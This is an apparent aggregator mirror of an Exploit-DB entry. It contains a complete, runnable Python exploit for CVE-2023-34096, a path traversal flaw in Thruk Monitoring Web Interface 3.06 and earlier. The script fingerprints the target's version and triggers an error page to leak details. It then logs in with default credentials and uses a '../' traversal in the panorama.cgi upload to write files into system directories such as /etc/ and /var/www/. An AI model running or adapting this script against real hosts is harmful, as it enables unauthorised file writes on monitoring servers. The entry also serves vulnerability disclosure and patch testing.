2
[webapps] Thruk Monitoring Web Interface 3.06 - Path Traversal
source link: https://www.exploit-db.com/exploits/51509
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Thruk Monitoring Web Interface 3.06 - Path Traversal
# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal
# Date: 08-Jun-2023
# Exploit Author: Galoget Latorre (@galoget)
# CVE: CVE-2023-34096 (Galoget Latorre)
# Vendor Homepage: https://thruk.org/
# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip
# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096
# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html
# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h
# Affected Versions: <= 3.06
# Language: Python 3.x
# Tested on:
# - Ubuntu 22.04.5 LTS 64-bit
# - Debian GNU/Linux 10 (buster) 64-bit
# - Kali GNU/Linux 2023.1 64-bit
# - CentOS GNU/Linux 8.5.2111 64-bit
#!/usr/bin/python3
# -*- coding:utf-8 -*-
import sys
import warnings
import requests
from bs4 import BeautifulSoup
from termcolor import cprint
# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py http://127.0.0.1/thruk/
# Disable warnings
warnings.filterwarnings('ignore')
# Set headers
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
}
def banner():
"""
Function to print the banner
"""
banner_text = """
__ __ __ __ __ __ __ __ __ __
/ \\ /|_ __ _) / \\ _) _) __ _) |__| / \\ (__\\ /__
\\__ \\/ |__ /__ \\__/ /__ __) __) | \\__/ __/ \\__)
Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06
Exploit & CVE Author: Galoget Latorre (@galoget)
LinkedIn: https://www.linkedin.com/in/galoget
"""
print(banner_text)
def usage_instructions():
"""
Function that validates the number of arguments.
The application MUST have 2 arguments:
- [0]: Name of the script
- [1]: Target URL (Thruk Base URL)
"""
if len(sys.argv) != 2:
print("Usage: python3 exploit.py <target.site>")
print("Example: python3 exploit.py http://127.0.0.1/thruk/")
sys.exit(0)
def check_vulnerability(thruk_version):
"""
Function to check if the recovered version is vulnerable to CVE-2023-34096.
Prints additional information about the vulnerability.
"""
try:
if float(thruk_version[1:5]) <= 3.06:
if float(thruk_version[4:].replace("-", ".")) < 6.2:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("This version of Thruk is ", end = "")
cprint("VULNERABLE ", "red", attrs=['bold'], end = "")
print("to CVE-2023-34096!")
print(" | CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")
print(" | GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")
print(" | CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")
print(" | CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")
print(" | Thruk Changelog: https://www.thruk.org/changelog.html")
print(" | Fixed version: 3.06-2+")
print("")
return True
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")
return False
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error parsing Thruk's version.\n")
return False
def get_thruk_version():
"""
Function to get Thruk's version via web scraping.
It also verifies the title of the website to check if the target is a Thruk instance.
"""
response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)
html_soup = BeautifulSoup(response.text, "html.parser")
if "<title>Thruk Monitoring Webinterface</title>" not in response.text:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")
sys.exit(-1)
else:
# Extract version anchor tag
version_link = html_soup.find_all("a", {"class": "link text-sm"})
if len(version_link) == 1 and version_link[0].has_attr('href'):
thruk_version = version_link[0].text.strip()
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")
return thruk_version
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("There was an error retrieving Thruk's version.")
sys.exit(-1)
def get_error_info():
"""
Function to cause an error in the target Thruk instance and collect additional information via web scraping.
"""
# URL that will cause an error
error_url = target + "//cgi-bin/login.cgi"
# Retrieve Any initial Cookies
error_response = requests.get(error_url,
headers=headers,
allow_redirects=False,
verify=False,
timeout=10)
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to retrieve additional information...\n")
try:
# Search for the error tag
html_soup = BeautifulSoup(error_response.text, "html.parser")
error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text
if len(error_report) > 0:
# Print Error Info
error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Recovered Information: \n")
parsed_error_report = error_report.split("\n")
for error_line in parsed_error_report:
print(f" {error_line}")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("No additional information available.\n")
def get_thruk_session_auto_login():
"""
Function to login into the Thruk instance and retrieve a valid session.
It will use default Thruk's credentials available here:
- https://www.thruk.org/documentation/install.html
Change credentials if required.
"""
# Default Credentials - Change if required
username = "thrukadmin" # CHANGE ME
password = "thrukadmin" # CHANGE ME
params = {"login": username, "password": password}
cprint("[*] ", "blue", attrs=['bold'], end = "")
print(f"Trying to autenticate with provided credentials: {username}/{password}\n")
# Define Login URL
login_url = "cgi-bin/login.cgi"
session = requests.Session()
# Retrieve Any initial Cookies
session.get(target, headers=headers, allow_redirects=True, verify=False)
# Login and get thruk_auth Cookie
session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)
# Get Cookies as dictionary
cookies = session.cookies.get_dict()
# Successful Login
if cookies.get('thruk_auth') is not None:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("Successful Authentication!\n")
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")
return session
# Failed Login
else:
if cookies.get('thruk_message') == "fail_message~~login%20failed":
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Login Failed, check your credentials.")
sys.exit(401)
def cve_2023_34096_exploit_path_traversal(logged_session):
"""
Function that attempts to exploit the Path Traversal Vulnerability.
The exploit will try to upload a PoC file to multiple common folders.
This to prevent permissions errors to cause false negatives.
"""
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("Trying to exploit: ", end = "")
cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])
# Define Upload URL
upload_url = "cgi-bin/panorama.cgi"
# Absolute paths
common_folders = ["/tmp/",
"/etc/thruk/plugins/plugins-enabled/",
"/etc/thruk/panorama/",
"/etc/thruk/bp/",
"/etc/thruk/thruk_local.d/",
"/var/www/",
"/var/www/html/",
"/etc/",
]
# Upload PoC file to each folder
for target_folder in common_folders:
# PoC file extension is jpg due to regex validations of Thruk.
# Nevertheless this issue can still cause damage in different ways to the affected instance.
files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}
data = {"task": "upload",
"type": "image",
"location": f"backgrounds/../../../..{target_folder}"
}
upload_response = logged_session.post(target + upload_url,
data=data,
files=files,
headers=headers,
allow_redirects=False,
verify=False)
try:
upload_response = upload_response.json()
if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")
elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":
cprint("[-] ", "red", attrs=['bold'], end = "")
print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
except:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("File upload failed.\n")
if __name__ == "__main__":
banner()
usage_instructions()
# Change this with the domain or IP address to attack
if sys.argv[1] and sys.argv[1].startswith("http"):
target = sys.argv[1]
else:
target = "http://127.0.0.1/thruk/"
# Prepare Base Target URL
if not target.endswith('/'):
target += "/"
cprint("[+] ", "green", attrs=['bold'], end = "")
print(f"Target URL: {target}\n")
# Get Thruk version via web scraping
scraped_thruk_version = get_thruk_version()
# Send a request that will generate an error and collect extra info
get_error_info()
# Check if the instance is vulnerable to CVE-2023-34096
vulnerable_status = check_vulnerability(scraped_thruk_version)
if vulnerable_status:
cprint("[+] ", "green", attrs=['bold'], end = "")
print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")
# Confirm exploitation
option = input("\nChoice (Y/N): ").lower()
print("")
if option == "y":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")
# Login into Thruk instance
valid_session = get_thruk_session_auto_login()
# Exploit Path Traversal Vulnerability
cve_2023_34096_exploit_path_traversal(valid_session)
elif option == "n":
cprint("[*] ", "blue", attrs=['bold'], end = "")
print("No exploitation attempts were performed, Goodbye!\n")
sys.exit(0)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("Unknown option entered.")
sys.exit(1)
else:
cprint("[-] ", "red", attrs=['bold'], end = "")
print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")
sys.exit(2)
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK